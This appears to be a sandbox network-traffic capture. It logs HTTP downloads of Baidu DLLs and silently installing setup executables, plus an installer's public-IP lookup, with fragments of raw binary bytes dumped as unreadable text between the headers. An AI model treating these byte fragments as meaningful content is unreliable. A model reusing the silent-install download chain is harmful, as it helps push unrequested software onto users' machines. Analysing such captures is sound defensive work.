Last-Modified: Tue, 20 Aug 2013 07:03:07 GMT

Expires: Sat, 12 Apr 2014 07:20:45 GMT

x-bs-version: A65F70E089635AE47A1E2AED4F13B889

ETag: 30cbc602ada7cdfb0346038c05996d84

x-bs-request-id: MTAuMjE1LjEzMi4yMzo4MDgwOjE1NjY4NjcxMTA6MDkvQXByLzIwMTQgMTU6MjA6NDUg

x-bs-meta-crc32: 2965621797

Content-MD5: 30cbc602ada7cdfb0346038c05996d84

x-bs-client-ip: MTE1LjIzMS40Mi4xMjA=
3.9n.W..1...h.....D$.UPf.l$..?h.....h.....L$.Q..<a...D$..P....I.f..
...f;.u. ...;.~.f.|D.\t.f.DD.\.f.lD.h......$....URf..$$.....g..j..D$ P
..$,...h....Q.....j.hhN....$<...h....R.R......a....,..$....P..;..F.
..z....= a..h.N..P..;..F...a...j..L$.Q..$ ...h....R.....j.h.N....$0...
h....P....... ..$....Q..;..F.......h.N..P...V.h.N..R.F....F..F.h.N..P.
..N.h.N..Q.F ...V.h.O..R.F$...F(.F.h.O..P...N.h,O..Q.F,[email protected].
..F4.F.h\O..P...N.hxO..Q.F8...V.h.O..R.F<[email protected].
FD..9n..FHt_9n.tZ9n tU9n$tP9n(tK9n,tF9n0tA.N4;.t:9n8t59n<t09n@t 9nD
t&;.t"UU.VLR....t..F....._^]3.[..........F.;..=<b..t.P...n..F.;.t.P
...n.j8U...V..e....._^]..@..[.............D$..@[email protected]
VW3.3.j,.D$H.D$L.D$P.D$XWP.D$4.@...|$L.|$\..e.....h........$....WQ.D$&
lt;[email protected]$B...D$D..D$E.D$F..D$G..D$HO.D$I.D$J..D$K.f..$.....(e
...].3....3.9{..|$..D$..D$..D$..D$ .D$$.|$,.......M.;.......9}.......9
}.t.Q.................M.Q3.h.P....$....h.....D$LR.D$T.D$X.D$\.D$P.....
..b..j0.L$d..$....WQ.D$`..d......D$PP.L$4.T$DQ.T$p.S......W.D$\0....|$
`.|$d.D$h.....|$l.t$p.|$x.|$|..$......$..........$......;.t.=.........
.9}.......9}.......3..L$,Q.M..T$.R.D$..D$..D$ .D$$.D$(.D$,...P.QS.....
......D$ [email protected][email protected]$,...D$..D$....Qj@...|$$..D$...|....|$
....q.......|......D$,P.E..L$.Q.J.PS......K....E...}........O.........
.G.;D$ ..........T$$r..2;1u.............s...t]..2... .uE...........tF.
.2... .u............t/..2... .u............t...2... .t...............3
..........p..E.........O...........;D$...k.......T$.r..2;1u.......
<<< skipped >>>

GET /client1/common/patch/16101830722/BDMNet.dll HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: dl1sw.baidu.com

Referer: hXXp://dl1sw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.0 302 Found

Cache-Control: no-cache

Connection: close

Location: hXXp://117.21.189.56/dl1sw.baidu.com/client1/common/patch/16101830722/BDMNet.dll?wsiphost=local

GET /client1/common/patch/16101830722/BDMNet.dll HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: dl1sw.baidu.com

Range: bytes=393216-

Referer: hXXp://dl1sw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.0 206 Partial Content

Expires: Sun, 27 Apr 2014 09:18:23 GMT

Date: Fri, 28 Mar 2014 09:18:23 GMT

Server: nginx

Content-Type: application/octet-stream

Last-Modified: Thu, 27 Mar 2014 06:30:30 GMT

Cache-Control: max-age=2592000

Accept-Ranges: bytes

Content-Range: bytes 393216-1176519/1176520

Content-Length: 783304

Age: 1193227

Via: 1.0 hncd45:8104 (Cdn Cache Server V2.0), 1.0 jxjj52:8888 (Cdn Cache Server V2.0)

Connection: keep-alive

Content-Disposition: attachment;filename="BDMNet.dll"
;.t.......j...9.$............$.........$......s...$.....T$.8..........
..s...$.....D$.8............s...$.....L$.8..D$ [email protected]......
3..x..u...$(........)...T$.j..D$.P..$....Q.T$ ............?......H..T$
hR..../......$........V..$....Q.......$...........$.....WP..$4...R....
......$.......$.....r...$....P.Bx.......$..........$..........$.......
$......L$h..t...'....t.......j.....$(.....t....t......3..p...$,...Q..$
......$.........9p......... ...d$DR.D.....$...........d$\j.j...$p....A
......A.....P.A....|....$.......$.......$.....T.....<..$.......$<
;...Q.........$.......$(......t..H...3..I.Q3.R..$D.....$......*....$..
......T$ ..$.......$<...P.......$.......$....Q.......$.......$D....
r...$0...R..v.......$D.........$@.........$0...........u...$....j..L$.
Q..$....R.D$0.D$ =.P.........................I..D$pP...\-......$.....W
.T$LR3...$...........$.....VP..$P...P.G........$......|$`.r..L$LQ..u..
....D$`.....D$\.....D$L...$.... .L$p..t..>%....t.......j......L$lQ.
J.....,......$....!j..D$0.O.P..$.....?.....$...."VP..$l...Q..........$
....$.|[email protected]$0...$....%.L$l..t...$....t
.......j....D$$.H...t....t......3..q...$H...Q..$.........9p......... .
...$......$....PR.......$....).......$....j.j...$.....A......A.....R.A
....y....$....*..$....%..$.....m.....<..$.... ..$x...Q.........$...
.,.D$$..$x...R..$.....#.....$.... ..$x...P.......$....%..$....Q.......
$.... ..$|....r...$h...R..s..........3...$|.....$x.....$h......$......
.$`....r...$L...P..s.......$`.....$\.....$L.......Q....3.9y...C...
<<< skipped >>>

GET /dl1sw.baidu.com/client/new_w1154/0403/BaiduAn_Setup_1.0.546.32_Sid_555555_Silent.exe?wsiphost=local HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: 117.21.189.53

Range: bytes=15466496-

Referer: hXXp://dl1sw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.0 206 Partial Content

Expires: Sat, 10 May 2014 14:15:15 GMT

Date: Thu, 10 Apr 2014 14:15:15 GMT

Server: nginx

Content-Type: application/octet-stream

Last-Modified: Thu, 03 Apr 2014 11:03:48 GMT

Cache-Control: max-age=2592000

Accept-Ranges: bytes

Content-Range: bytes 15466496-30926975/30926976

Content-Length: 15460480

Age: 52238

Via: 1.0 fjqz160:8104 (Cdn Cache Server V2.0), 1.0 jxjj53:25001 (Cdn Cache Server V2.0)

Connection: keep-alive

Content-Disposition: attachment;filename="BaiduAn_Setup_1.0.546.32_Sid_555555_Silent.exe"
.k<(..Ut.k. ;J. .C....cXW.k..G^...k.....R.5hLL...s..UM$g...-....H .
..0..2[[email protected]\.........vw.....Z.GBw...
...-.{....x.@..>5..^\.u...e..Oc......0._(}.pLA_....P..1@0<..0..!
=.Bp..M.YC.@.}..([).`W}..f.\u..j,.#:..Au?.Q0...f/....h..e.........I...
.Bs..m..:......b..7.5..}.C...$J60.qS.Z.O.>....2...q./...?.C..*_...#
P..>..`C[h...Y.......c....ya.X:6.c.sD..e.6...0.. |..[.....-..r..l".
........L..P.....s...h.b..I>.<.Q..... .Y.7.w.f.........'...}...s
[email protected]#..X.I...9....W.O....j...O....S.o.....<.s&
o.......>X ..H5.v..vG.......x^.._....yl.}.'...-...2}......!0r.qVTn.
...n.^[email protected]
..r.$q...X.,.&;.....GV.~..F....>...s,.?..P...N..."......i=L.#.v...U
.fF..v...:...D..CJ.7.~...u.X,...Z%...W...e1.,[email protected]..`........
.A...Z.3..M.p'...M... 6..p<..H.'[email protected]..;...da.cc[...#..._eY...).....
.}2.mIq4...D"[sC..y........$...=B...o..'......:.^X.....uG.M UwG.HsG..@
@6.3....L...! .-.5~....2......4..}......%.R..X.9.R~e......T..e.6-$.>
;_9"....7Z.%.a.....Yn....S.........~.HA.V7-..$oU.u...*V...&'g..k...?2.
..:l.... l.!8.s....4...... Sm=..!...c..0...^)..{.I...Q2bdc....b...R-..
.Ui\..tN.(........R.x..].{...........Z...v..5...7.......`...Ai.x<]r
.W..c..3.t_Y.J..^.U.........,....Y~w.R.W.=]...r..!.foe.F.K9._.....D.X.
.........5..d....oN.._..K.'...5!..=Mn..J{.[..A...*yUj..i.I.....D4HR..%
.*.÷[[email protected]......'.0.t.W.V...F...DW..^8D~^@.L.. ?O....E.U..
../..k..3. ......e...!Z"G...WS....).G8R$p{tJk2.....G.J...3....>
<<< skipped >>>

GET /sw-search-shadu/client/dllv4/BDMReport.dll HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: dlsw.baidu.com

Referer: hXXp://dlsw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.1 200 OK

Server: JSP2/1.0.26

Date: Fri, 11 Apr 2014 04:45:37 GMT

Content-Type: application/x-msdownload

Connection: close

Content-Length: 1207520

Access-Control-Allow-Origin: *

Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE

Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id

Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length

Accept-Ranges: bytes

Last-Modified: Tue, 20 Aug 2013 07:03:07 GMT

Expires: Sat, 12 Apr 2014 07:20:45 GMT

x-bs-version: A65F70E089635AE47A1E2AED4F13B889

ETag: 30cbc602ada7cdfb0346038c05996d84

x-bs-request-id: MTAuMjE1LjEzMi4yMzo4MDgwOjE1NjY4NjcxMTA6MDkvQXByLzIwMTQgMTU6MjA6NDUg

x-bs-meta-crc32: 2965621797

Content-MD5: 30cbc602ada7cdfb0346038c05996d84

x-bs-client-ip: MTE1LjIzMS40Mi4xMjA=
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......M......S...S
...S.Y.S...S.[.S...S.[.S...S...S...S.[.S!..S...S...S...S...S.[.Sd..S.[
.S...S.[.S...S...S...S.[.S...SRich...S........................PE..L...
.!.Q...........!.....P... ......u........`............................
...........................................j.......V..................
[email protected]..@............`
..t............................text....O.......P.................. ..`
.rdata..1....`.......`..............@[email protected][email protected]........
[email protected]...............................@[email protected]..............
[email protected]..................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
..................................................................
<<< skipped >>>

GET /dl1sw.baidu.com/client1/common/patch/16101830722/BDMNet.dll?wsiphost=local HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: 117.21.189.53

Range: bytes=983040-

Referer: hXXp://dl1sw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.0 206 Partial Content

Expires: Sun, 27 Apr 2014 09:18:23 GMT

Date: Fri, 28 Mar 2014 09:18:23 GMT

Server: nginx

Content-Type: application/octet-stream

Last-Modified: Thu, 27 Mar 2014 06:30:30 GMT

Cache-Control: max-age=2592000

Accept-Ranges: bytes

Content-Range: bytes 983040-1176519/1176520

Content-Length: 193480

Age: 1193230

Via: 1.0 hncd45:8104 (Cdn Cache Server V2.0), 1.0 jxjj53:8888 (Cdn Cache Server V2.0)

Connection: keep-alive

Content-Disposition: attachment;filename="BDMNet.dll"
............P.......X..."...........................................".
......<...................................".......h................
..................."..................................................
."[email protected]..."................
...................................................................8..
.".......(.......H..........................."........................
..................."...............................................)..
.....B..."..................................................."........
...........................................".......H..................
.................".......|............................... .......*..."
.......................................P.......Z.......d.......n......
.x..."................................................................
...".......(...................................".......l..............
................. .......*.......4..."................................
...................`.......j.......t.......~..........................
."...........................................................".......&
lt;............................... ...".......x.......................
........Z.......P...".................................................
......................................"...............................
............".......0...................................".......\.....
......................................"...............................
........@..."...................................................".
<<< skipped >>>

GET /sw-search-shadu/client/dllv4/BDMReport.dll HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: dlsw.baidu.com

Range: bytes=622592-

Referer: hXXp://dlsw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.1 206 Partial Content

Server: JSP2/1.0.26

Date: Fri, 11 Apr 2014 04:45:38 GMT

Content-Type: application/x-msdownload

Connection: close

Content-Length: 584928

Content-Range: bytes 622592-1207519/1207520

Access-Control-Allow-Origin: *

Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE

Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id

Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length

Accept-Ranges: bytes

Last-Modified: Tue, 20 Aug 2013 07:03:07 GMT

Expires: Sat, 12 Apr 2014 07:20:45 GMT

x-bs-version: A65F70E089635AE47A1E2AED4F13B889

ETag: 30cbc602ada7cdfb0346038c05996d84

x-bs-request-id: MTAuMjE1LjEzMi4yMzo4MDgwOjE1NjY4NjcxMTA6MDkvQXByLzIwMTQgMTU6MjA6NDUg

x-bs-meta-crc32: 2965621797

Content-MD5: 30cbc602ada7cdfb0346038c05996d84

x-bs-client-ip: MTE1LjIzMS40Mi4xMjA=
V.1.0.q..p.......;.u.^...........T$..L$.;..D$.t.V.q.......;..0.q..p.u.
^............L$...4....H...................................D$..V......
..t.V.1b.......^.....D$..V........t.V..b.......^....V.t$..F.=....s....
....^.P........F......^.......j.h....d.....P..0..v..3.P.D$4d.....3..T$
...A....h.........wF.$........A..L$4d......Y..<....B..L$4d......Y..
<[email protected]$4d......Y..<.h....h<...j..L$..T$...7..h.......D$@..
....<..P.L$...F...L$..D$<......7..3..L$4d......Y..<.3...H...]
...3...]...H...3...H...]...3...............V.....N.;.t.P.sj...........
..........A...............T$...V.t$...;.w.r..B.;F.|.3....^...........^
[email protected]...>.u...e.....N.;H.u...e...V....F...^.........
V...>[email protected].;A.u...e....^...........V...>.u...e.....
N.;H.u..pe...F....^..............A..T$.3.;B......................A..T$
.3.;B......................................................A.V.t$.W.|$
..........F.u...d...>_..^............D$.........h....Q..U..i.....i.
.A..... ...y......................D$.........h....Q.IU..i.....i..A....
. ...y......................A....D$..P................................
.....V...>.Wu...d...|$..F...........;A.w.;A.s...c...~._..^.........
..V......W.|$.t.;.t...c...F.3.;G._.....^...........D$...t&.L$......Q..
P..Q..P..Q..P..Q..P..I..H...................V.......N.W.|$....O.u..Qc.
....F.;B.u..Bc...N....._.V.^..........S.\$.VW.|$...........t.9_.w.;_.v
...c...>_.^...^[................VW..3.9~.~....I......Q...........;~
.|......_;.^t.P.Na..Y........VW..3.9~.~....I........t.....j......;
<<< skipped >>>

GET /ic.asp HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: iframe.ip138.com

Connection: Keep-Alive

Cache-Control: no-cache

GET /ic.asp HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: iframe.ip138.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Fri, 11 Apr 2014 04:51:32 GMT

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Content-Length: 218

Content-Type: text/html

Set-Cookie: ASPSESSIONIDAATBACTB=LDNEFLHDOLDHCCAMGNDBHNJD; path=/

Cache-control: private
<html>..<head>..<meta http-equiv="content-type" content
="text/html; charset=gb2312">..<title> ....IP.... </title&
gt;..</head>..<body style="margin:0px"><center>....I
P....[184.107.38.38] ............</center></body></html
>..

GET /client/new_v1196/0409/Baidusd_Setup_1.0.287.272_Sid_10001_Silent_Defense.exe HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: dl1sw.baidu.com

Range: bytes=8126464-

Referer: hXXp://dl1sw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.0 302 Found

Cache-Control: no-cache

Connection: close

Location: hXXp://117.21.189.55/dl1sw.baidu.com/client/new_v1196/0409/Baidusd_Setup_1.0.287.272_Sid_10001_Silent_Defense.exe?wsiphost=local

GET /dl1sw.baidu.com/client/new_v1196/0409/Baidusd_Setup_1.0.287.272_Sid_10001_Silent_Defense.exe?wsiphost=local HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: 117.21.189.51

Referer: hXXp://dl1sw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.0 200 OK

Expires: Sun, 11 May 2014 04:42:10 GMT

Date: Fri, 11 Apr 2014 04:42:10 GMT

Server: nginx

Content-Type: application/octet-stream

Content-Length: 30451944

Last-Modified: Tue, 08 Apr 2014 22:03:37 GMT

Cache-Control: max-age=2592000

Accept-Ranges: bytes

Age: 209

Via: 1.0 fjqz158:80 (Cdn Cache Server V2.0), 1.0 jxjj51:10001 (Cdn Cache Server V2.0)

Connection: keep-alive

Content-Disposition: attachment;filename="Baidusd_Setup_1.0.287.272_Sid_10001_Silent_Defense.exe"
[email protected]/...........................
..!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8
...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8.......
.PE..L.....GO.................p.......B...9............@..............
.............)......@[email protected].........$
.pI..............P....................................................
........................................text....o.......p.............
..... ..`.rdata...*.......,...t..............@[email protected]....~...........
...............@....ndata...P...0...........................rsrc...pI.
...$..J..................@[email protected]........)[email protected].
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U....\.}..t .}.F.E.u..H
[email protected][email protected]...
..@..}[email protected]... M..........M........E...FQ.....NU
..M.......M...VT..U........FP..E...............E.P.M...H.@..E..P.E..E.
[email protected]}[email protected].}.j.W.E......E.....
[email protected][email protected][email protected] [email protected].
u.....@._^3.[.....L$...-G...i. @...T.....tUVW.q.3.;5.-G.sD..i. @...D..
S.....t.G.....t...O..t .....u...3....3...F. @..;5.-G.r.[_^...U..QQ
<<< skipped >>>

GET /dl1sw.baidu.com/client/dllqq/BDLogicUtils.dll?wsiphost=local HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: 117.21.189.50

Range: bytes=294912-

Referer: hXXp://dl1sw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.0 206 Partial Content

Expires: Thu, 24 Apr 2014 09:30:27 GMT

Date: Tue, 25 Mar 2014 09:30:27 GMT

Server: nginx

Content-Type: application/octet-stream

Last-Modified: Tue, 18 Mar 2014 11:58:16 GMT

Cache-Control: max-age=2592000

Accept-Ranges: bytes

Content-Range: bytes 294912-926535/926536

Content-Length: 631624

Age: 1451690

Via: 1.0 fjpt155:80 (Cdn Cache Server V2.0), 1.0 jxjj50:25001 (Cdn Cache Server V2.0)

Connection: keep-alive

Content-Disposition: attachment;filename="BDLogicUtils.dll"
8 [email protected].<.............<6|.<9~.<_u
_V.u..M.......M..<......u.u..........u..F..u..u..M...............u.
V.M.......E.P.u......YY^.....j..u..E..u..u.P.=...3..}.*...P.E.P.u.....
... [email protected]..'....M........u.Q.M..<....M........u!.M.....
...u.j .M.......u..M.......M..E.P.!....E...h....h.9...0,...}.3.;.u.3..
[email protected]..=.....E.. ....5,....5$....5(.....E.PV.u..u..u
...l....|.....l....&....E............E...........E... ...j..d?..Y.U...
<.......$..SVW..2.....<....e..........!u........N.R........C....
........P....$.8...hd#.......h\#.......hX#.......hP#.......hH#........
.O..............S..}.....X..e....._..r....<.......<....E......M.
.......L}t..G.L..F}=..$t.............h@#........u..E.P.....Ph8#...u..g
.......?...h0#.........H|}..I~...K.sh(#.......h #.......h.#.........N.
.......OtU..WtI......w:.E...<...P.....YP.M.......M..)............E.
.M.P..........h.#...fh.#..._j.[.u..e..!u..M................M.....j..E.
P.E.P.E.P.Z.......E..u.h.....M.......E...h."....h. ...M.......2......"
.E..C...ht ...M......h."...M..T........h.......CtMj.Y .t8 .t4 .t0 .t,.
..uS..E...Et. .t. .t. .t. .u:.E.Phh ...E....E.Phh ...E....E.Ph."...E.P
........P.M..S....M..............Q.E.j P.X......P.M..q.........M......
..t8...t!h."...M.........t!h."...M..|........t.h."...M......j*.E.P.E.P
.u............u.j..u..........E._^[.... ...5...?...I...S..............
....U.....V.5<......3......!M. ..U.........$tl...t8Ht..u..u..<..
.YY.....h."...M.......M........u.j .M..C....u..M........<....M.
<<< skipped >>>

GET /sw-search-shadu/client/dllv4/BDMReport.dll HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: dlsw.baidu.com

Range: bytes=655360-

Referer: hXXp://dlsw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.1 206 Partial Content

Server: JSP2/1.0.26

Date: Fri, 11 Apr 2014 04:45:41 GMT

Content-Type: application/x-msdownload

Connection: close

Content-Length: 552160

Content-Range: bytes 655360-1207519/1207520

Access-Control-Allow-Origin: *

Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE

Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id

Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length

Accept-Ranges: bytes

Last-Modified: Tue, 20 Aug 2013 07:03:07 GMT

Expires: Sat, 12 Apr 2014 07:20:45 GMT

x-bs-version: A65F70E089635AE47A1E2AED4F13B889

ETag: 30cbc602ada7cdfb0346038c05996d84

x-bs-request-id: MTAuMjE1LjEzMi4yMzo4MDgwOjE1NjY4NjcxMTA6MDkvQXByLzIwMTQgMTU6MjA6NDUg

x-bs-meta-crc32: 2965621797

Content-MD5: 30cbc602ada7cdfb0346038c05996d84

x-bs-client-ip: MTE1LjIzMS40Mi4xMjA=
....$......$....3..L$..D$ 3..D$x.....\$t.\$d..$.....F.;F.s......s.....
...F..N........W7...F.;............................t/.U.P.B.V......u..
|$x........D$dP.'......2......;.........$..........$......$.....F.;F..
.$.....s......s........L$..F....T$.R....5..:........D$.P..$....Q....7.
.........j.S..$....R.L$l.{.....$.......$............$....P.p..........
..L$ UQ.L$.VW..............|$x.r..T$dR.>......2.......F.;F.s......s
........T$..F....D$.P....5..:...V....|$..L$t.........;...U....|$x..D$d
s..D$d....\$$.D$(.T$,.L$0.\$4.\$8.\$<.\$=.L$@.\$D.D$H.....D$L.....\
$P.D$T@....\$X.\$\.D$ UP.L$,Q.L$ W..$......'............L$`..^..9\$$..
$...........L$$..$............9.$....r...$....Q.#......9t$x..$........
..$......$..............9.$....r...$....P........9t$x..$..........$...
...$...........L$dQ........2..d.|$x...f....D$dP........2..H9\$$..$....
t..L$$.C#...|$x...4....L$dQ.e......2....|$x.r..T$dR.M..........$....d.
.....Y_^][..$....3.........................V...F...PVQV.D$.P...5....N.
Q........3..F..F.^................U..j.h....d.....P...SVW..v..3.P.E.d.
[email protected][email protected][email protected]
.d......Y_^[..]....M..<...j.j.. .......D$.V...L$.PQ...\.....^......
...V.t$.;.Wt..|$(W.....)~..D$..P..L$$...q..T$....r....r..y..z..P..Q._.
p.^.$........V...F...t.P.........N..F......F......F...........D$..t.V.
.........^................V...F...PVQV.D$.P........N.Q.c......3..F..F.
^................j.h....d.....P...SUVW..v..3.P.D$ d........t$..F..(...
D$(.....l$..|$....^.t.;.t......;.t...u......;o.u.......M.......L$.
<<< skipped >>>

GET /client1/common/patch/16101830722/BDMNet.dll HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: dl1sw.baidu.com

Range: bytes=294912-

Referer: hXXp://dl1sw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.0 302 Found

Cache-Control: no-cache

Connection: close

Location: hXXp://117.21.189.57/dl1sw.baidu.com/client1/common/patch/16101830722/BDMNet.dll?wsiphost=local

GET /dl1sw.baidu.com/client1/common/patch/16101830722/BDMNet.dll?wsiphost=local HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: 117.21.189.57

Range: bytes=294912-

Referer: hXXp://dl1sw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.0 206 Partial Content

Expires: Sun, 27 Apr 2014 09:17:19 GMT

Date: Fri, 28 Mar 2014 09:17:19 GMT

Server: nginx

Content-Type: application/octet-stream

Last-Modified: Thu, 27 Mar 2014 06:30:30 GMT

Cache-Control: max-age=2592000

Accept-Ranges: bytes

Content-Range: bytes 294912-1176519/1176520

Content-Length: 881608

Age: 1193307

Via: 1.0 hncd45:8104 (Cdn Cache Server V2.0), 1.0 jxjj57:8888 (Cdn Cache Server V2.0)

Connection: keep-alive

Content-Disposition: attachment;filename="BDMNet.dll"
T$$R.{0.\$$........3..t$..}..t .D$P..D$$P.rI......D$P..L$.......D$P..L
$$Q.B....D$P......t.S......D$ ......t..T$$R.0............D$......L$Hd.
.....Y_^[..][email protected].
...t$..D$..\$ .D$H....P.D$(.~.P.Z....D$H....L$$.L$.t"V.....3..T$$R.{(.
\$$........3..t$..}..t .D$H..D$$P..H......D$H..L$.......D$H..L$$Q..0..
.D$H......t.S.0....D$ ......t..T$$R.([email protected]_^
[..]........j.h....d.....P.....3.P.D$.d......D$......D$.P......L$.d...
...Y..................j.h....d.....PV.....3.P.D$.d......t$..D$......F.
P.Z......L$.d......Y^...........j.hj...d.....P.....3.P.D$.d......D$...
...D$.P../...L$.d......Y..................j.h....d.....PV.....3.P.D$.d
......t$..D$......F.P.Z/.....L$.d......Y^...........j.h....d.....PV...
[email protected]$........N..W..V..D$........L$.d......
Y^......j.hZ=..d.....PV.....3.P.D$.d......t$..D$.PV.P....D$........N..
W..V..D$........L$.d......Y^......j.h....d.....PQSV.....3.P.D$.d......
t$$.\$ 3.;.tV...tQ...u.V.j...u&..hHR...........#....L$.d......Y^[.....
.HR...F..F..L$.d......Y^[.....t$..D$.;.t.SV......D$........u.S.c....L$
.d......Y^[.....j.h....d.....PQSV.....3.P.D$.d......t$$.\$ 3.;.tV...tQ
...u.V.j...u&..h.S...........#....L$.d......Y^[.......S...F..F..L$.d..
....Y^[.....t$..D$.;.t.SV......D$........u.S......L$.d......Y^[.......
t .~..r..F.P.:.......F......F.....V.F.......Y.U..j.h.l..d.....P...SVW.
....3.P.E.d......e..........E.....j..........E..E....t..M.QP.......3..
E.....E........M.d......Y_^[..]....M...t...j.....j.j...8..........
<<< skipped >>>

GET /sw-search-shadu/client/dllv4/BDMReport.dll HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: dlsw.baidu.com

Range: bytes=393216-

Referer: hXXp://dlsw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.1 206 Partial Content

Server: JSP2/1.0.26

Date: Fri, 11 Apr 2014 04:45:24 GMT

Content-Type: application/x-msdownload

Connection: close

Content-Length: 814304

Content-Range: bytes 393216-1207519/1207520

Access-Control-Allow-Origin: *

Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE

Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id

Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length

Accept-Ranges: bytes

Last-Modified: Tue, 20 Aug 2013 07:03:07 GMT

Expires: Sat, 12 Apr 2014 07:20:45 GMT

x-bs-version: A65F70E089635AE47A1E2AED4F13B889

ETag: 30cbc602ada7cdfb0346038c05996d84

x-bs-request-id: MTAuMjE1LjEzMi4yMzo4MDgwOjE1NjY4NjcxMTA6MDkvQXByLzIwMTQgMTU6MjA6NDUg

x-bs-meta-crc32: 2965621797

Content-MD5: 30cbc602ada7cdfb0346038c05996d84

x-bs-client-ip: MTE1LjIzMS40Mi4xMjA=
..Q.D$$.E.VP.....E..T$ Q..$VP..........................Q.D$$.E.VP.....
E..T$ .....$VP..........................Q.D$$.E.VP.....T$ ..P.E.VP....
......E.........QVP.L$LQ............P.E.VP....$........|$X...$........
....D$DP.........r...............Q.D$$.E.VP.....T$ P.E.VP.......C...E.
......j.VP.....L$..U..D$ ....4Q.D$(........VR.....T$$.L$ P.....L$....;
L$(.L$........D$...u..L$..D....N....p...........f....$.x........R,..X.
D$(.E.VP.....T$(P.E.VP.......D$...u..L$...........R0..\.D$(.E.VP....R.
T$,P.E.VP.......D$...u..L$...........R4..`.D$(.E.VP.....T$(P.E.VP.....
..D$...u..L$..~........R8..d.D$(.E.VP....R.T$,P.E.VP.......D$...u..L$.
